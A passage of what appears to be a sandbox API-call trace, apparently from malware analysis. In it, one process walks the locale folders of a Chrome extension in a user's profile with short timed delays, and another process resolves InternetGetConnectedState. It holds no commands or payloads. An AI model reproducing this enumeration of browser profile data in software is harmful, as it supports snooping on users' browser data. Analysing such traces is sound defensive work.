| 07:44:16,138 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\eu\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:16,138 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xd0\xc4\xd8m\xe0\x91\xcf\x01 \xea\xfbm\xe0\x91\xcf\x01\xd0\xc4\xd8m\xe0\x91\xcf\x01\xd0\xc4\xd8m\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd0\xc4\xd8m\xe0\x91\xcf\x01\x1cT\xd9m\xe0\x91\xcf\x01\x00\xcc\x97s\xd2\xc7\xcd\x01\xd0\xc4\xd8m\xe0\x91\xcf\x01\xf3\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:16,138 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:16,138 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:16,218 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\fi\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:16,218 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xd0\xc4\xd8m\xe0\x91\xcf\x01 \xea\xfbm\xe0\x91\xcf\x01\xd0\xc4\xd8m\xe0\x91\xcf\x01\xd0\xc4\xd8m\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd0\xc4\xd8m\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\x01\x01\x00\x00\x00\x00\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:16,218 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:16,218 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:16,298 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\fil\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:16,298 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x00L\xdam\xe0\x91\xcf\x01 \xea\xfbm\xe0\x91\xcf\x01\x00L\xdam\xe0\x91\xcf\x01\x00L\xdam\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00L\xdam\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\x04\x01\x00\x00\x00\x00\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:16,298 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:16,298 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:16,378 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\fr\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:16,378 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x00L\xdam\xe0\x91\xcf\x01 \xea\xfbm\xe0\x91\xcf\x01\x00L\xdam\xe0\x91\xcf\x01\x00L\xdam\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00L\xdam\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xfc\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:16,378 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:16,378 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:16,458 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\he\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:16,458 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x000\xd3\xdbm\xe0\x91\xcf\x01 \xea\xfbm\xe0\x91\xcf\x010\xd3\xdbm\xe0\x91\xcf\x010\xd3\xdbm\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\xd3\xdbm\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\x16\x01\x00\x00\x00\x00\x00\x00\x18\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:16,458 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:16,458 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:16,538 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\hi\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:16,538 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x000\xd3\xdbm\xe0\x91\xcf\x01 \xea\xfbm\xe0\x91\xcf\x010\xd3\xdbm\xe0\x91\xcf\x010\xd3\xdbm\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\xd3\xdbm\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01Y\x01\x00\x00\x00\x00\x00\x00`\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:16,538 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:16,538 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:16,759 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\hr\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:16,759 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00`Z\xddm\xe0\x91\xcf\x01 \xea\xfbm\xe0\x91\xcf\x01`Z\xddm\xe0\x91\xcf\x01`Z\xddm\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00`Z\xddm\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\x07\x01\x00\x00\x00\x00\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:16,759 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:16,769 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:16,799 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:16,799 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:16,799 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:16,799 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:16,799 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:16,849 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\hu\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:16,849 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00`Z\xddm\xe0\x91\xcf\x01 \xea\xfbm\xe0\x91\xcf\x01\x90\xe1\xdem\xe0\x91\xcf\x01\x90\xe1\xdem\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\xe1\xdem\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\x08\x01\x00\x00\x00\x00\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:16,849 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:16,849 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:16,929 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\id\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:16,929 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x90\xe1\xdem\xe0\x91\xcf\x01 \xea\xfbm\xe0\x91\xcf\x01\x90\xe1\xdem\xe0\x91\xcf\x01\x90\xe1\xdem\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\xe1\xdem\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\x05\x01\x00\x00\x00\x00\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:16,929 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:16,929 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:17,009 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\it\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:17,009 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x90\xe1\xdem\xe0\x91\xcf\x01 \xea\xfbm\xe0\x91\xcf\x01\x90\xe1\xdem\xe0\x91\xcf\x01\x90\xe1\xdem\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\xe1\xdem\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\x02\x01\x00\x00\x00\x00\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:17,009 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:17,009 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:17,089 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\ja\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:17,089 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xc0h\xe0m\xe0\x91\xcf\x01 \xea\xfbm\xe0\x91\xcf\x01\xc0h\xe0m\xe0\x91\xcf\x01\xc0h\xe0m\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0h\xe0m\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01%\x01\x00\x00\x00\x00\x00\x00(\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:17,089 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:17,089 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:17,169 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\ko\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:17,169 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xc0h\xe0m\xe0\x91\xcf\x01 \xea\xfbm\xe0\x91\xcf\x01\xc0h\xe0m\xe0\x91\xcf\x01\xc0h\xe0m\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0h\xe0m\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\x19\x01\x00\x00\x00\x00\x00\x00 \x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:17,169 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:17,169 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:17,249 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\lt\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:17,249 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xf0\xef\xe1m\xe0\x91\xcf\x01 \xea\xfbm\xe0\x91\xcf\x01\xf0\xef\xe1m\xe0\x91\xcf\x01\xf0\xef\xe1m\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0\xef\xe1m\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\x1d\x01\x00\x00\x00\x00\x00\x00 \x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:17,249 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:17,249 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:17,329 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\lv\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:17,329 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xf0\xef\xe1m\xe0\x91\xcf\x01 \xea\xfbm\xe0\x91\xcf\x01 w\xe3m\xe0\x91\xcf\x01 w\xe3m\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 w\xe3m\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\x02\x01\x00\x00\x00\x00\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:17,329 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:17,329 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:17,409 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\ms\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:17,409 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00 w\xe3m\xe0\x91\xcf\x01 \xea\xfbm\xe0\x91\xcf\x01 w\xe3m\xe0\x91\xcf\x01 w\xe3m\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 w\xe3m\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xa0#\x08n\xe0\x91\xcf\x01\xfe\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:17,409 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:17,409 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:17,490 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\nl\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:17,490 | 504 | NtQueryDirectoryFile |
